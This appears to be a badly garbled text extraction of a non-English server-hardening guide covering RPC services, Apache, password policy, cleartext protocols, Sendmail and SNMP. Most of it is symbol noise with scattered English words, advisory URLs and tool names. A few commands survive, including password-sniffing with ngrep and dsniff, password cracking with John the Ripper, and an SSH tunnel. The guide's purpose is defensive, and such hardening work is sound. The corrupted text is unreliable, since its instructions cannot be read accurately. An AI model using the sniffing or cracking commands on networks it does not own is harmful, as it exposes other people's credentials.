U# 6* 5 0, < P , , e G ! ". /0(123& " # Z F" ? $ rpcinfo" a, RPC Program ) - @ R4 S @ ^ ) N 4 " - Y RPC T) , 6U ) RPC SERNIS Number 100083 Rpc. Ttdbserverd P! Rpc . cmsd 100024 Rpc.statd 100005 Rpc.mountd 100232 sadmind 100235 Cachefsd 100249 Snmp Xdmid buffer Overflow 785/ n 9 " C 5! RPC H- Y Z 6- 100068 ) 6:3 W L3 ' ) ("c ? # 2 $ Buffer overflow R4 S @ ^ _O * , 7 L SB g] j4% H ) Z:3 : , <P -, " b RPC , 5 F , 5 T , B ) h / K6?# O * , Overflow & @ 1 " E RPC g- F =GX 4 - Y 6U ) l ' R4 S @ ^ ( E ,! " " ,G # " & @ 0, 5 2 6 - Y 4 ) X RPC " $ I'/ ?) 1 - 6U ) " K6U ) : . " Z F% ! Z F T 5G ,/ " j g 6 ?# , 456 123& P% DY/ I 5 • 6MR/ ) ? 5 TG' g 0,< F) ? 
@ MR/ ?# $- , 5 F ) - " )"E RPC ) ) 6 'F ! " %& a B ! 0, b ' F ' - Y , 6' 6U ) 5 #P < ) ?@ " • -,< K Patch 2 3@ SL a 0 - Y _http://sunsolve.sun.com ] h @ " U c http://www.ibm.com/support/us 0 a h @ " IBM , &'( AIX - Y http://techsupport.services.ibm.com/server/fixes) ) http://www.redhat.com/support/errata a h @" U 0 7 L http://www.debian.org./security - Y Patch 2 3@ SL ) 6 @ 9 1 I5 E F7 B 5! 0 <( E 5 135 7 4 ) RPC portmapper 0, 5 V8 T) ' ) UDP ) TCP , K5 V8 $ l ' J) " 785/ 5 % 785/ " 3 B ^ 32789, 32770 Loopback 6 DY/ windows ) i: ^ B! _ UDP ) TCP] 111 7 ^ ) F c $ KF F [ g B! , g 4 5 4 4 _UDP ) TCP] 67 4 ? 5 TG' " - Y 0, 5 5/ 1 ) - PBuffer overflows 0 TP " %/ NFS % ' 6 $ , ^P a 6 P IP/ ? & " - Y 1 , 3 b'7 L R4 S @ ^ - Y " 6h @ " ? RPC ^ % ' 6 j 4 : , #4 nfsbug" " - Y B5# 7 !89 R 3 a 5 http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html http://www.cert.org/advisories/CA-1997-26.html http://www.cert.org/advisories/CA-2002-26.html http://www.cert.org/advisories/CA-2002-20.html http://www.cert.org/advisories/CA-2001-27.html http://www.cert.org/advisories/CA-2002-25.html http://www.cert.org/advisories/CA-1999-08.html http://www.cert.org/advisories/CA-2002-11.html http://www.cert.org/advisories/CA-1999-16.html http://www.cert.org/advisories/CA-2001-11.html http://www.cert.org/advisories/CA-1998-12.html http://www.cert.org/advisories/CA-2001-05.html http://www.cert.org/advisories/CA-2002-10.html http://www.cert.org/advisories/CA-2003-10.html http://www.cert.org/advisories/CA-2003-16.html http://www.cert.org/advisories/CA-2003-19.html Apache Web Server 0 ) 5 O) ? , 6 U ) 78# (A-2002-,CA-2002-2717] - a 3W 3 R4 S @ 6 ' " 7, , F) & PHP ) CGI 0 bP ! ?@ ) 4@ -, 6 U ) _DoS] U ) h / 6- -)8! 6 „1# & O) -, 6 U ) " $?@ 4@ ? `56 1 ) < R4 S @ ^ R4 S @ ^ F) 7 # _Apache] O) -, 6 U ) 4@ , ) 6T)„ 3W 3 R4 S @ ^ " 4@ $ _IIS] ' # ) %K 0 6=GX 2 1 ), ? 5 TG' g ) 6% '2 3 , - 9* )j 5 ) - " -, 6 U ) _ 3) # ] -, 6 U ) ? '- 9* $() * ,G ) e '7 L 4@ $l '? 
# , 5 - Y "), ) 3 W 3 R4 S @ ^ 4@ 0, <P -)8! 0 4@ Z F SL $ U I =B* B! , & H U# 6 1) U# " 4@ +, N 6* 6* & ) 5 " " ? " \ 2 0 5 SL & 0,< + 4@ SK-, 6 U ) R4 S @ - . W L3 ("c 7 !89 S a 5 - Y h @" ? ! ". /0(123& " 6@ I5 6h @ " ? $ Apache 1.3.x : • http://www.apacheweek.com/featurity/security -13 h @" ? Apache 2.0.x | http://www.apacheweek.com/features/security-20 • R4 S @ d * ah @" - Y - . I 5 ("c 0, < P '7 !89 G X) Z W 0 "2 ,Y $-,< - < 6h @ ("c 7 4) L3 & http://httpd.org/ ! " %& a K "7 4$ 456 123& 4@ O) -, 6 U ) DY/ I 5 • -,< K patch 2 3@ SL " ? 59 " 6 @ http://httpd.apache.org h @ " ? I5 : 2 0 5 - Y levels Patch ) 6 * h @" ? $ 4@ Q code Sourde 6* 6Patch 2 3@ -, < K I5 http://httpd.org/download.cgi 0 5 - Y h @" ? GX) 2 3@ ' ) 6 @ I5 0 5 - Y | http://httpd.org/dist/httpd/patches/ " ? $ 4@ 6* code Q Source I5 0 5 - Y http://httpd.apache.org/download.cgi h @ h @" ? 6Ptch 2 3@ -, < K 0 5 - Y - Y ? @ " +F ? G #B 5! mod . I 4@ ( R4 S @ ^ " ("c : ("c 0, - "2 % 5 2 4@ ) ) $ I 2, ), ) X 6-" .ZF 5 _CA-2002-27] –ssl % - 5 - Y SSL O F$ ? G 4 E " E %H ,/ W 3 0 4@ 0 < ,6 * $ chroot Login 8Q 0 C / 0 ) - Y •|• G', c 0, 5 $ -, 6 U ) 0 6) I5 ! patching " ? 59 ,B 6T)„ C ' - < # 2 Open ) 6 @ http://www.apache.org/dist/httpd/patches/ % ! ) X ' F" l '-) ,E = G ;! B 4 Chroot ) •ROOT , E = G;! ? G, Chroot 0 session F 6% ' 5 -,6 F W L3 H $, 5 , 4 6 ),. $ l ' ) E $ /chroot ( U) 4@ ?@ F 3 G', - <& S I 5 O) -, 6 U ) 0,< &'( 0 - Y ) 7, F 3 * " 9 1G'W L3 , 5 3 0 ' # ("c ?@ K loggingW L3 '# < ) [ U) : 6% ' 6 '? @ a 5 - Y g ' 6T)„ I ) , " S ?@ I5 B "+ " , 6A) ? G$ I I5 ) -, 6 U ) g ) R3 4 ) 6 BH $ logging 7 B 5! H )"E B' ,G ("c 7 , 5 ? @ &1 @ 6% 1G'\ 4@ -, 6 U ) ("c 2 6 0, 5 ?# 4 , ?# S •c 7) Y 2, 0 6 6 6U) , F 7 !89 " W 3 I ) •c !89 !89 +P 2#5 W L3 3 4@ Chrooting ("c O) -, 6 U ) R4 M :G 7 L c 4@ -, 6 6- Y Z W L3 F) chrooting -, 6 U ) F %K 15 / ) K W L3 6 ,' 5 F) chroot " z 3 ) % ! + P ) < 6 #6 6U ) ?# $, 5 " g@ P F7 [ , 9P 3 0 5 Z F chroot b. ?@ b. 
< TP, " H /chroot/httpd ("c 0, 5 6 ' B : ) F & 7 2, 0 < , 6 * ^P ,6 * I 6j* # 2 CGI,PHP 0, @ 4@ # F c 2 0 1G') Z F chrooted 7 L '# -)8! 0 W 3^P > P l' S ),. : 8Q 0, C 5< ' 6 '$-, 6 < K<@ (E < @ •c I 5 0,< ,6 3 http://httpd.apache.org/docs/logs.html h @ " Apache 1.3.x 0 <- Y http://httpd.apache.org/docs2#5 -, @ j 4 b < F h @ " Apache ) )Y 2.0.x 0 < - Y 2.0/logs.html ) CGI , PHP " # ? ) •c < P [ l ' GX) 0,<P ' ,, $ ( ,H $ - Y Œ # =GX POST ) GET W L3 S j< 4 0, 5 6 'O) 6% ' ("c &1@ ? j &' I 5 ) O) -, 6 U ) - 56 l ' ^ P 0, 5 6 _detection Intruder] 25/& N 4)- 6 ^ mod_Security n 9 " , R 47 6 . 6 „ 1# 7 B 5! ? 5 •c 0 5 POST ) GET bP O) P " - Y Z ) F ModSecurity d * •c F 5/ 0, 5 " K N 4 F " $ ModSecurity 4@ -, 6 U ) -http://www.modsecurity.org/ -http://www.securityfous.com/infocur/17064.152.44.126%20152.44.126 a # 4 N ], Z " 5 T G' g I5 ,! # , 5 F 2 6? " 0_,< < F 6 ' Apache User Id H , 5 6 ' User Id F : ,F ) - Y 7 #B 5! - . K<@ , - 5 - Y 4@ . 6 ? # 2 SuEXEC 4@ ? . CGI ) SSI ) 6@ P I5 ) : 2 a 5 - Y " / 6 2 , 0 , < O) -, 6 U ) L 3 CGI )SSI -, < < ,< ("c j 3 $ setupid Root $ User Id % b " - Y ) X # 7, , S 0, < , 6 3 MR / $ ? 5F ) X SSI ?@ ( &1) -, 6 U ) P 7) Y User Id " - Y - Y ) F) ? @ ) PHP,CGI,SSI " F ) 2 < ?# ) j6 ;! ) PHP,CGI,SSI F ? # $ SuEXEC 0 < - Y SuEXEC " 3 'P 9 ") ) SSI,CGI,PHP # Server Side Includes 3 , 6? " 06 # ", 0, K5 TG' g # : SuEXEC ( 3 <) S 0,< ,6 3 N 6h @ " ? 6 , # 4 (,! 6- Y/ SuEXEC " http://httpd.apache.org/docs/suexec.html h @ " Apache 1.3x 0 <- Y http://httpd.apache.org/docs- h @ " Apache 2.0.x 2.0/suexec.html 0 <- Y ) cgi- bin 6 0, MR/ $ 5 e 'j 4 B / " S1: . W L3 6 # F a 5 HTTP header ("c ) ( E 6 l '\ X 40PHP " 23 - < W L* ("c 5 ) 7 !89 K ; ! C ' 6 )- # % < 25 z 3 1 2 4 ? 5 T G' g a B5# 7 !89 safe 1/ ' PHP h @" ? W 8Q 0 C G X) P I5 ' X 0 < Corss Site Scripting XSS % h @" ? L3 2 http://www.securityfocus.com/printable/infocus/1706 0 5 - Y T)„ W L3 2 " ,G mod_Security B5# 7 !89 -,6 Injection SQL&XSS % < R4 S @ ^ 0 5 - Y 1 )„ " - Y DY/ ;! 
, 0 5 - Y &'( F " ? 59 T L. # : ) &5 2 0 56 &K/ & # _ http://www.cirt.net/code/nikto.shtml h @ 0 <@ http://www.modsecurity.org/ 6 6& " ? ) CGI % H] Nikto )j 4 6& 2 P ,Account 2N P 2 9P % G $? ,K ,6 3 N $? 6 <) 6, ) Q0 b ,K f ) T) , -,< K P! 6& $ C 5 e *f 2N P <) $ P !& " - Y !89 $- 6 )? ) % ' DY/ I ?@" 0 6) 6 '-,< d * ,6 * E + + ?@ " - Y ?# $? H $-,< - P , K " U4 0 < 6" E ) 7 " F $ -,< , K + ?@? "E 1G'$ SB g $ -,< , K + ?@? "E 1G'$ SB g , KF) , ?@ (E DZ H$ E N`6?), ) ?@ =GX ) ) /j ) R 0, < ? " b P !& : P! & ^P < TP, -,< K 6account Y 6% 4" 75 I # u P! F) 2 ) X$ 5 - Y , N) = G 0 < 3\ P ? " € + " ? " % < P !& • -,< = G Account P !& 6& " ? S • DY/ (,! 0-,< = G , account E ?# $ F ,H ') = GX 6 &'( 4 5! , B <R hashing , " -,< & ) -,< N -, @ DY/ 2 N1 S P 3 h 83 ( '$ hash , / < ,6 3 SB g F) 2 )b P! & • N1 $ hash )E $ -, < 3 < $_ ?@ ,6 • 6' P! & Hashing ) ) , , Hashe , 0 N& ] P ! )% ! 0, 5 , / B 5! -)8! + 2 1 ), ) 2 $ , 6-, 4, -, < 2), " I' 6 1G' P ! & ,H ' ) = GX account P ! & ,H ' ) = GX 6& ( #. - < \ ' i: 21 ) a 0 •c H ,F 7 , , e G - 5 account R4 S @ ^ ,6 3 !89 0,6 ,F , , , % ! 9 " )- ) -, ) , K " U4 ? @]0,< 0_ F ) -, < = G U 4 ,< 1G' # , P !& 2 " U 4 ?5F ,63 P [?@ , -,< P ! & 2' + H 5 $ ?# 3 1 ) - 3• 6% 5G1 $ F ?@ - , 5 ,H 6& " - Y 0 P! & )d* 7 P !& ? " S d GP$ P! & ) ( #. 2 = G W L3 ("c ! ") * ) User ID & h ?@ ? ,K, @ ' 0 ? ) ,G ? $, 5 DY/ , 2 P ! 6account , , ,F ? " F <d * 6 'F ) " - Y < , ) " g@ S P! & # )- b hash ) 6 'hash d * ?, N ], 5 I 5 MD5 crypt 5 , H • Y% P !& ? ?@ " : 5 $l ' ,6 3 %. ? , K ?# " etc/shadow % '0, P! & " 2 0_, (E ? 5 - 3• 6 2 1 & !89 6% 'V < K6U ) I5 - 3• I 5 etc/shadow u -, N10 5 - Y & SL b P! l' 6& ? 5 0 I 5 -, < + " H ("c - 3•) hashes N1? 0 3 A8 $ cracker C ' - Y hashes S 4 /etc/passwd % '?, 3 F 3 % H root 3 - 3•W L3 ?, 3 ?# ) 2 #< N1" S " 5 b 6account # B . b < # P !& ) /etc/passwd F) #P< ? ?5F ) ? " #P< I 5 ? 5F 5 L hashes /etc/shadow BH 0, < b P! & P ! ! ". /0(123& ) -,< <R V < !89 + ) ,< K6account " # - Y 6& " ? 
'& , < h, / % H 6 ,6 3 , , 2 e G < #40 +, )% ! + H ("c 25 d[Network Information SystemZ NIS , NIS / 0 ! 5E % < ) 6 ' #P < ,G , (Mapping) U ) ?# 7 !89 ) - 5 %5! 6U ) H Network File System (NFS) , 6, hash P ! P ! % < NIS , 6& #4 6& C 85! ) 6 '? ) NIS+ P! * ]l ' 6* , %# ), !89 I #P< 6U ) 3 6 ? @ ?, 3 ?# , - 4 , ,F 6 * 6& " 6% '$-, @ %5G / 9 5 I $ NIS " -, < " N ], <P hashes F ^ ("c ^ P 2 )- 0, H,, e G C 5! LDAP ("c ( #. # 4 ) I 0_ , u -, ?@" - Y , F SL b l 'b < # 2 56) - %# $_, ,F 6 0, 5 -, < " ,6 3 F) F) $ ) etc/shadow b 47 # ' b P !& =GX a I - < $, - 5 V 5 ,H ? j4 - Y N ,G 3 $l ' # ) 0,< 1 ), 5 ? , 0, 5 - Y : c 5G C 6U ) #4) )S P ! ) N ("c 4 5 6 GP $ - 5 6& 7 L " %/ P ! 6& =GX % < SF ("c ? , b 0? " % )= ! 5E SL g 6U ) , <P 456 123& 6%5G1 G? a,<P S " P ! & ,H ' \'2 P 5/ 6 e ' ! " %& " $ 5 SL 7 B 5! # ) X ) 6 " )% ! K6account ) 6account ("c ) - 5 6U ) < 6? " #P < )% ! b 2 g )? ," % , ^ 2 9 / I'. : 6A) " : ) X g L 6& ? < TP, & ) = GX e 'j 4 7 P! ) h, / ? # $ , account ? 5 TG' g ^ $ #P< ) ! 5E 6& d * 3? " 6SL 0 , P ! hashes )2 - b #. 5#. ? @ ( #. K S &' * " - Y ? P P ! d * N F- 5 $, < -, < 3 < 5B A" @ $ 6? " ?@ )- -J ) " 3? 6 P! ! M) / ) ,! \X ) 5 $O 3 P !& ? ("c 2 I 'L c 9 < 6& P " %5 Q O* N F2 0 <- 0 , K5 = G 3 -,< 3 < ( B' ( ) " )@ ( $O W 3 (E * - 93 ?@ d * $ & " $ " " U (8! 6& ,1 <P?@ " I 5 ("c % 5G1 " ? T ("c A" 6 #) h &N F E P 785/ ?, < F 7 H? - - < # 2 ?@ _ H I ("c 0 )@ ?" 2 ), " U 4 0_‚ , P4 ) 4 " ? 59 ] " ) -,< 1 ) K5 - 3• -, < F I5 ? I5 @ ? !$7 P ! 6& 3•" M, 6] , <P %# $ -, < = G 6 % 5G1 P! P !& " ) - 3• P ! %5 # / ) 5B E ) O * W L3 5 MR/ $ 5B -J) password d * 6& P = G _pa$$w0rd], 5 - 6 -,< Y P !& $_ -J ) M) / ) KP Y1M) / " ("c Y 3 M) / • ,G 6& O* , , 0_? @ =B* P! $ 5B 6M / 2 1 ) 2' ] ) # : 0, < ,6 3 crack $ 0,< -,< h PH (E ],< "password" ( K6 P! SB g 0 = G - . W L3 2 ? H& " 6 P !& 2 M) / % ,P ( ,H C ' A) 6A) " - Y ,6 3 785/ " \ 2 KP Y1M) / " I5 ) - 5 )6? " ?@ " ,G 0 ' ? "W L3 ) P !& d * " - Y ) ,G • " ? 59 6? ' T /2 ! <) " S ) ( #. P !& 7 B 5! 
$ & @ P 785/ ( 6 6& ( E 0 5 crack 2 P !& $ T#< A" @ ) S ,G PF 62 ) T 5! " U 4 P! 6& . 2 & 2 0 % 5! " U 4 P ! 6& Npasswd " , 6 U : -, < d * 6 * 6 0, 5 - Y . 7 ]Cracklib " , * ?), ? , - <\ X ) 6 P ! $ I5 I # 0, 5 F) Enabled , crak ?@ 6& 1/ Cracking C, E P! ("c , < 5 $? " ,< P '7 B 5! ? ("c 6" E 0 ( E -, < 6& ("c v 4 & _ E 2 " 6& O * - . W L3 +H ) F u 5 John the Ripper , (4lc4)10 phtcrack version K6 P! 7 6& ? G ) stand-alone - Y cracking " - Y $= GX b & PAM-Enabled P ! 2 ) u P !& #P< ) L $ P !& % 7 K " U4 ? " , " DY/ 2 < Q0 6 N " U4 0 5 b 6% 5G1 I K6 & " - Y ?# ? , " ("c " E S S 6 - Y -,< ? ) Npasswd 5 l' 6 ) ("c F N656 I 5 ("c , PAM- S 1) U# Q 0, 5 - Y _ Crack $ E 0 6%5G1 ) A & l ' GX) )C3 0 "] K ? @ I $? ,K & S I5 N K <) 0 hashes 0 P! 6& # 0 #. - Y etc/shadow/ " F) hashes I 5 A8 ) hashes " - Y W L3 \ 2 # - 5 (N P ! 6& ("c " 0 3 P : (E 2 LDAP ) NIS 6" E $, -, 2 &N F 25 6 & ) 25 9 6" E - 3•/etc/passwd ) NIS ?, 6 ) $, -, # H 6$, < 0 , 6 3 ? @ cracking 6* 5 • DY/ $, Z F LDAP DY/ ? # 6& -,< " ) < 25 F) 25 2&N F 25 <, 6 & g 9 6 - Y % 4 : - Y MDS N1" 2 0 - Y 6& ? 5 hash P ! 5 7 L N I 5 Crypt 5 ,H N1" 0 b ? @ 0 DY/ (, ! 7 ' ,63 ? $, < , 5 ,H ) #. H, , e G A" @ I 2 < (, ! $ N DY/ ) ,< P! & < 4 P! & " %P H)S 6& ? P ! 6& : 2 0 1E E 6 N4 W 3 K6 2 ) ) ) X 62 ) " 0 V ? " , ?@ % has expired O* 3 K6( 4 2 ` • P $ 5 - Y ?@ " , account 60 P ) 5#. ) , ,F P! & u 7 ) X ) _ ' L 7 L -,< , 1 ] 1 ) B 1 $ 6 ) ' H , P4 : 2 )? ) ("c) ( E ^P P ! N 1 -,< , K 3 - 56) " P ! & log in 2 1 ) , & / ? 59 ?@ ? # 54 "2 I K6 K6account MR/ ) 1 P! 0 B' 4) K T ) T G' g 6account &5 0 < +H ) , Y ) P! & A" @ ? 6A" @ ? U) : 6& <- $, 5 , ,F 6account , # 4 0,< ? b %L K ("c - Y ?@ " DY/ B . SB g 0 ("c 2 ) " ?# 7 0 6& P ! , account 60 account P ) $? , Y 5! ( 5 -, 6, ' 0 MR / P ! ?@ ?, 3 ?# ? / P $S K (,! 0,<P F $ 6& 6 B 5F " , -,< - 3•?@ P !& U) % < F) ? N Your password 3 F B 5G1 , <P = GX ? " ("c ' P ! 6& ) P -,< 6account ? 
)&' I 5 - 4 $,< (N " 5 ?@" - Y 3 nB G account MR / 0 "% I ' 3 - Y $, - 5 Clear Text Servies 7 L $ U# $ P N& =GX 0, 5 ?# P !& 6 -,< - Y 5 - Y ?5F 3 6- I? telent ) FTP bP 7 !89 d * 2 2 F ?# $S ? 5F b N )( d * 0 , <, 6 3 Clear 7 2 _ L 7 !89 text plain " )- , b !89 SL <] -,< U# < ?# b ' ,B )- 6 " R4 S @ )@ +5F a,6 3 6N 6- #P < 6U ) ? , ) ))7 L $ -, 6 U ) -,< - . _login 7 !89 ] $ F <d * 0, 5 !89 I 5 8Q 0 )@ , 6 3 , 6 3 plain- text 7 !89 " ,G ) -,< E ^ P 7 6v 4 ) ? , 6' ,5! ) - Y $ sniffer -, < K 2, SB g 0 N& h / 7 !89 ) #P < 6U ) " ) 6 ' _ #P< ' -,6 ] bP B . #P < 6U ) " _ ) N6 ] 3 785/ ) 6 P! & 3 1 " T),F $, 5 1P $ Text U) Clear 7 4 Clear Auth 1 @ Content FTP 21,20 Yes Yes $2 TFTP 69 Yes N/A $2 telnet 23 Yes Yes 2 SMTP 25 Yes N/A $2 Pop3 110 Yes Yes $2 rlogin 513 Yes Yes 2 HTTP 80 Yes Yes $2 ? 6, K , 6 3 TP, ? ^ 2 c h / F$2 6- FTP ) Telnet I K6U ) T L 7 !89 $ , < " ,E - Y 2 7 , 6U ) < TP, b $ P !& clear text 7 , 0, 5 Z F $ , K F$ ) - " 2 ‚ / T3 - Y ? 5F Clear text I ?5F -)8! , 5 ? @" - Y 0,< 7 !89 % < &1?), % a I YB* 7 , , 7 !89 d * )$ < $ ,L -, < K 6* 5 Free/OpenBSD j 0, 5 SL 6U ) ) 2 3@ ^ l ' 6U ) "2 $: " 3 +, 6 ZQ 6U ) ] l ' R4 S @ : d * ? 5F b _sniffer] -, < - Y 6& 5 5 ]U 1) U# $ e 'j 4 7 L $ _,< + clear 7 5 ) FTP )telnet ] T) , 2 I ", ) " $-, < K U# 5 0_, <P )( 3 - *1 7 $785/ ( E - Y text Clear < L 7 $() * 0, 5 0 I 5 A) 2 &'( ! ". /0(123& 2t5: ) 2 [ # $ _text ? 5 T G'- . 0 5 - Y tcpdump $ "2 " 7 L clear text ^ P a F 2 1 ), 0 6d * I 5 $l ' #tcpdump-X-s1600 5 - Y & ngrep a assword 6 ' #P< -, ' - .0 I I N ) sername 6 I W 3 K N1 $ 15 / • & M) / 5 - Y " ? " 2 E F ?# $ l ' I 5 $ M) / 21 )] , 5 http://www.packetfactoty.net/projects/ngrep/ 0_ "7 L l' ? 5 TG' #ngrep assword h / 0 6- d * "2 I5 & 2 1 ), 6% # ) 4 ) N \ h @" ? l ' ? 5 TG'- . 0 5 - Y : 2 $ Dsniff 0 5 - Y _ P !& )( ]? P! & ) ( z)" ? @ $ d . " U4 ) ( E 6& " ? 5 W L3 ("c POP3 ) Telnet )FTP ? )@ $l' I $ E/ Plain text , 0 , 63j 5 http://www.monkey.org/~dugsong/dsniff/ a "7 L $l' #/usr/sbin/dsniff ! 
" %& level•Link , ,< N& %H ,/ ) End- To- End N, # T G •$ 7 # ) connection 6 N& BH m .1" 6%# ) 4 3 N& " - Y +H ) , Y ? $,< 5 _tunneling] h SSH % H] ) Z F U# )(replaces 6* R 4 M :G ) T) , Q l' -, < " - 4 5 I] N& ( E SSl OpenSSh _ http://www.openssh.org/ h @ telnet,rloging,rsh) ) - " 7 9P 0 "2 _ HTTPS , POP3S K6% # ) 4 ) $ SSH:Secure Shell n 9 " 0 456 123& - Y X11 )(pop3,SMTP I ?@ " ? I K6%# ) 4]tunneling ) 0, 6 2< ? ) connection ) ?@ , POP3 ? 5 tunnel - . Z F & SSH 0 " P POP3 -, 6 U ) a K5 F -, U) #ssh-L110:pop3.mail.server.com:[email protected] - < localhost 7 4$ 6 7 4POP3.MAIL.server.com 7 7 L # ) #1 # ) #1 4 -, 6 U ) 4 -, U) $ ] TCP110 T 5G T) M83 ) 2 < 2 7 9P 5 S 110 2, _ 0 (tunneled over SSH) 0,< ,6 3 ( E -,< & stunnel " - Y tunneling P ) _ openSSL Toolkit " - Y 0 ] " , * plain text 7) Y ' N& T) , - 4 6% / - " N # SSL %# ) 4 $ l 'A) 0 6%# ) 4 ? 5 tunnel 0 5 - Y http://www.stunnel.org h @ " ? I5 ?@ ? l' ' Senmail 6 ? 5 ) ') ' $ T # Sendmail 0 " ? G ?@ " - Y $ 785/ ? (,! : # ) #1 )- )? ? - Y U - 1) 4? ,6U) - 5 ? 5F 5 ,H % 1 , -,< ( E 785/ Q : 2 - 6 SB g # #1 Mail Transfer Agent 2 1 ), - 3 ?1 $ Sendmail I 5 ?@ " - 56 ' # ) #1 6 1 ) M ,6" - -,6 $-,< SL a 5 - < ?@ +" U „@ # Sendmail 0 ^P 6* ,G S 3 785/ " patch 5 2, CERT ADVISORY CA-2003-12-BUFFEROVERFLOW IN SENDMAIL -CERT ADVISORY CA-2003-07-REMOTE BUFFER - CERT ADVISORY CA-2003-25 BUFFER OVERFLOW IN SENDMIL a 5 -,5! -) ) ? SENDMAIL bP 7 , , ) 7 :3 , , 6 3 BUFFER OVERFLOW ?@ #4) % , PC 8Q], < T) \ 7 , , ") < TP B ! 7" PATCHING (, ! ) e 'j 4 , #4 " Y 7 GP , B % ! 0_ # ) #1 6 S 2' +" ) 5 ,H - 1 @ & 6* 6% '" - Y " - Y () \ 7 , , C,5! B B ! 0 $() * send mail " -, < S L * 0,< - 5 U# )U +, 1 6* TG'e 'j 4 7 L $l 'U ) + * K )f , 5 ,H * - ) ' ' j6 ?@ ? 5 d* I 0, 5 - Y R4 S @ ^ X ! Send mail <R HS @e G " 0 ! ". /0(123& 6patch ) R 4 S @ ?& $ 9 < ,6 3 5 CP l ' &'( sendmail " , , ,F -, patch * - 5< Echo\$z\usr /lib/sendmail- bt-d0 7Y , $ , #4 F sendmail -, < " ? 
sendmail -,< d * l' K * 2 3@ " 6 @ , < http://www.sendmail.org/current-releaese.html h @ ! " %& 4 sendmail DY/ ) " a $ F 6patch 2 3@ " ) Z * http://www.sendmail.org h @ " ? ] % ! ? , X ! 9 25 2 3@ source code patch I F - 5 sendmail * -, < K % ! 456 123& • * ' 0 # ' " %/ - Y 5 - Y ? $_package 0 5 GF U 1 6 ?@ Q 1G') - P I e 'j 4 7 • L C 5! sendmail mail -, 6 U ) ? ! # @ /] U# ) daemon ) 6 _ ,6 * mail SL ? # _ –bd ˆK ? 5 T G' g]0, K5 T #4 : sendmail sendmail 1/ 2 < ,6 3 etc/mail/sendmail.cf h @ F l ' 62 < F) ? `56l ' 6 # 4 % ' mail reliy , b <( E c 5G ) C ^P # ) #1 P 5 , 0 - < sendmail.cf $ , < ( #4% ' 0 . " " Z F deamon 1/ $ !89 + " ? : 2 sendmail 0 % H • ("c # / ? 596, < ( E , #4 a 5 - Y http://www/sendmail.org/tips/relaying.html http://www/sendmail.org/m4/anti_spam.html T G' g e 3j 4 , 'j 4 7 #4 L open relay ? # sendmail 8.9.0 * ?@ C, E $ % ! 6 ? , - 5 -, < K sendmail * $% ! -, 6 U ) - Y (, !] ( E X !" " - Y 7 W " ,G0,< 0, 5 L3 2 ("c TG' H _realying]0 ("c$_ N -, ? 5 ˆ K ] sendmail , ,F * * , $ 5 ,H * b -, < K $ sendmail , h @" ? , #4 #4 " - Y ? " 6% ' u W L3 ^P 7 K &F " ("c 6@ • , 0 0 5 - Y http://www/sendmail.org/m4/readme.html download ) - Y pgp signature " 9 " " g@ 6* integrity <R Q # * ?), ca-2002-28 h @ " ? ? " E " ? 59 < H 0 <- Y 3O * " sendmail F + ?@ " /S ? " : 2 • # I # 2 $ ("c : 5 sendmail 0 5 source code sendmail B5# 7 !89 2 ' 6trojan I5 0 , 5 , - 5 sigm I 6, B0 5 - Y CERT advisory -, < - Y http://www.sendmail.org/ftp/pgpkevs/ h @ " ? I 5 MD5Checksum " a 5 - Y sendmail ' PGP ?, '7 )@ , 0 - Y sendmail +P , INTEEGRITV " !89 + " ? 
7 !89 S http://www.sendmail.org/secure-install.html http://www.sendmail.org/m4/security_notes.html gshapiro/secu rity.pdf http://www.sendmail.org /~ Simple network management protocol (SNMP) 6- N 5 SNMP" - Y , # 4) ) - " y # I 5 ?@ " 0 < SB g - Y $T - 1 )$ 6Access Point$ 6ˆ K $ 6 ) $ N4 " $SNMP0 < #P < - Y $ #P <y ) SNMP 6N , 6N TCP/IP G - Y SNMP %# ) 4 " I #P< 7) Y P ' 4 6( '784 2 I K 6N , ) , 6N 6- " 2 ( 4 1P I5 ' ) )Y 0, 5 " PG ), K (& # ) -,< 1P ,G * ]SNMP , -, < - Y 6N I 5 -,< - Y B % 6A) 6A) ! B 5F " $ 6 ( 4 bP R4 S @ ^ b 6( 4 3 -, < K (E H$l ' R 4 S @ ^ , ) , I 5 -, < - Y " - Y # 4 _U ) 6 A) " [ ? 5F 0 ? ' 9 SNMP A) " [ , G 7c L. ) - P ),. SNMP" W 3 ,1 b ), K : 6A) - Y R4 S @ ^ 0 5 -,6 $03-2002-CERT…h @‘ ? R4 S @ ^ 0 3 3 SNMP R4 S @ ^ 0, < 7 K &F - 5 _ 6( 4 #4 % <& * $l ' ? , " ] DOS \ " 7) Y 785/ SNMP P 7 & E ) 7c@ 2< -, < - Y o SNMP 5 , H ] & ? G -,< & $ SNMP 5 , H 6A) " [ N& S 6* g’ V 6( P e % ! N "$ -, Y SNMP 5 i: j &' I 5 ? , , 1 " < $h / 6- ^ $ SNMP ' ) !89 < TP, I5 _?@ -, < % L 3 M, 6nH ) S * e 'j 4 7 T, " - Y -, < K P 6A) W L3 #P< 7 & E " % /f %1 , : $"), ) F 2 - Y ) ("c , G ) G I 5P ^ u“ L 3 “7 L 3 ) 7 !89 Z ' 25F 0,< ,G ) TG' SNMP 5 SNMP - 5< * $SNMP #4? ) ,< - 5< * d * SNMP0_, * 5 U# 785/ Q $SNMP -, < d * U# ?@ - 5 ) SL SNMP * U T G'e 'j 4 7 SNMP , # 4 6 1) U# % ! 6 L $l '% # ) 4 SNMP l ' R4 S @ : $ P 785/ &1 @ ,, e G )- 6 - Y $ Bridges ) 6point access$ 6 N4 0 0 Q 0, < ^P 3 785/ & c L. $ N ]0, < “V X ! ] #P< Q 0, < K 6T, " - Y ,K " ,G b H$l '7 !89 " - Y , 1 , 5 B!, j & ' ) 6 F j , 4 R4 S @ ^ <0_, 5 O* 6( 4 , K " 5 i: L ? , H 6N 3 ] 6N 6 * 0_78# - Y R4S @^ PG PG ) , K I 5 " $SNMP) ) <’ 'j 4 A N0, < 6( 4 " 4 " 6A) " - Y (,!0, 5 <“ , 6* P 5 SB g 0, #P <% ! 6 0 < ,6 3 =GX 6 ) X ! ) 6N H,, e G R4 S @ d * ? 2 $ #P< -,< %L ) F 5 $ SNScan N 4 6N 0 5 - Y ) SNMPSL A) P ) #5 - . I5 " h @n 0 9" 5 ("c 7, - ? $ ? , 2 E F$? F) N 4 0 I 5 ("c 7 B 5!$SNMP " 1 ("c " http://www.foundstone.com/knowledge/free_tools.html ' W L3 @? 
